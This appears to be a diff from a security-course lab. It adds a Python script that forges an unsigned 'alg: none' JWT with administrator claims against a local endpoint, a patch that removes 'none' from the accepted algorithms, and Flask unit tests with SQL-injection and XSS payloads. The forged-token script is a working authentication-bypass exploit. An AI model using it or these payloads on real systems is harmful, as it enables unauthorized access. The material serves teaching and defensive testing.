Task3

JWT/exploit_jwt.py

@@ -0,0 +1,43 @@
+import base64
+import json
+import urllib.request
+import ssl
+import time
+import urllib.error
+
+def base64url_encode(data):
+    return base64.urlsafe_b64encode(data).rstrip(b'=')
+
+header = {"alg": "none", "typ": "JWT"}
+payload = {"account": "administrator", "role": "Admin", "aud": "https://127.0.0.1/jwt/none"}
+
+header_b64 = base64url_encode(json.dumps(header).encode('utf-8')).decode('utf-8')
+payload_b64 = base64url_encode(json.dumps(payload).encode('utf-8')).decode('utf-8')
+
+jwt_token = f"{header_b64}.{payload_b64}."
+
+print(f"Generated Token: {jwt_token}")
+
+url = "https://127.0.0.1:443/jwt/none"
+data = json.dumps({"jwt_token": jwt_token}).encode('utf-8')
+
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+
+req = urllib.request.Request(url, data=data, headers={'Content-Type': 'application/json'})
+
+# Retry loop because server might take a moment to start
+for i in range(10):
+    try:
+        with urllib.request.urlopen(req, context=ctx) as response:
+            print("Response Status:", response.status)
+            print("Response Body:", response.read().decode('utf-8'))
+            break
+    except urllib.error.HTTPError as e:
+        print(f"Attempt {i+1} failed: {e}")
+        print(f"Error Body: {e.read().decode('utf-8')}")
+        time.sleep(2)
+    except Exception as e:
+        print(f"Attempt {i+1} failed: {e}")
+        time.sleep(2)

JWT/jwt-signature-apis-challenges/app.js

@@ -31,7 +31,7 @@ app.post('/jwt/none', (req, res) => { //None endpoint
     } else if (jwt_b64_dec.header.alg == 'none') {
       secret_key = '';
     }
-    JWT.verify(jwt_token, secret_key, { algorithms: ['none', 'HS256'], complete: true, audience: 'https://127.0.0.1/jwt/none' }, (err, decoded_token) => {
+    JWT.verify(jwt_token, secret_key, { algorithms: ['HS256'], complete: true, audience: 'https://127.0.0.1/jwt/none' }, (err, decoded_token) => {
       if (err) {
         res.status(400).json(err);
       } else {

Python/Flask_Book_Library/Dockerfile

@@ -11,6 +11,9 @@ ENV PASSWORD=1qaz@WSX
 # Instalujemy zależności
 RUN pip install --no-cache-dir -r requirements.txt
 
+# Run unit tests
+RUN python -m unittest discover tests
+
 # Ustawiamy zmienną środowiskową, aby Flask wiedział, jak uruchomić aplikację
 ENV FLASK_APP=app.py
 ENV FLASK_RUN_HOST=0.0.0.0

Python/Flask_Book_Library/tests/test_book_model.py

@@ -0,0 +1,70 @@
+import unittest
+from project import app, db
+from project.books.models import Book
+
+class TestBookModel(unittest.TestCase):
+
+    def setUp(self):
+        app.config['TESTING'] = True
+        app.config['WTF_CSRF_ENABLED'] = False
+        app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///:memory:'
+        self.app_context = app.app_context()
+        self.app_context.push()
+        db.create_all()
+
+    def tearDown(self):
+        db.session.remove()
+        db.drop_all()
+        self.app_context.pop()
+
+    def test_valid_book_creation(self):
+        """Test tworzenia książki z prawidłowymi danymi."""
+        book = Book(name="Valid Book", author="Valid Author", year_published=2023, book_type="Fiction")
+        db.session.add(book)
+        db.session.commit()
+        self.assertIsNotNone(book.id)
+        self.assertEqual(book.name, "Valid Book")
+        self.assertEqual(book.status, "available")
+
+    def test_invalid_year_negative(self):
+        """Test tworzenia książki z ujemnym rokiem. Powinno nie przejść walidacji."""
+        book = Book(name="Negative Year", author="Author", year_published=-100, book_type="Fiction")
+        self.assertGreaterEqual(book.year_published, 0, "Rok wydania nie powinien być ujemny")
+
+    def test_invalid_empty_name(self):
+        """Test tworzenia książki z pustą nazwą. Powinno nie przejść walidacji."""
+        book = Book(name="", author="Author", year_published=2023, book_type="Fiction")
+        self.assertTrue(len(book.name) > 0, "Nazwa książki nie powinna być pusta")
+
+    def test_sql_injection_attempt(self):
+        """Test próby wstrzyknięcia SQL w nazwie."""
+        bad_input = "Book'; DROP TABLE books; --"
+        book = Book(name=bad_input, author="Hacker", year_published=2023, book_type="Hacking")
+
+        self.assertNotIn("DROP TABLE", book.name, "Wzorzec SQL Injection powinien zostać oczyszczony lub odrzucony")
+        self.assertNotIn(";", book.name, "Znaki SQL Injection powinny zostać oczyszczone lub odrzucone")
+
+    def test_xss_injection_attempt(self):
+        """Test próby wstrzyknięcia XSS w autorze."""
+        bad_input = "<script>alert('XSS')</script>"
+        book = Book(name="XSS Book", author=bad_input, year_published=2023, book_type="Hacking")
+
+        self.assertNotIn("<script>", book.author, "Wzorzec XSS powinien zostać oczyszczony lub odrzucony")
+
+    def test_extreme_data_length(self):
+        """Test ekstremalnie długiego ciągu znaków."""
+        long_str = "A" * 10000
+        book = Book(name=long_str, author="Author", year_published=2023, book_type="Fiction")
+
+        try:
+            db.session.add(book)
+            db.session.commit()
+
+            saved_book = Book.query.filter_by(author="Author").first()
+            self.assertLessEqual(len(saved_book.name), 64, "Nazwa powinna mieć maksymalnie 64 znaki")
+
+        except Exception as e:
+            pass
+
+if __name__ == '__main__':
+    unittest.main()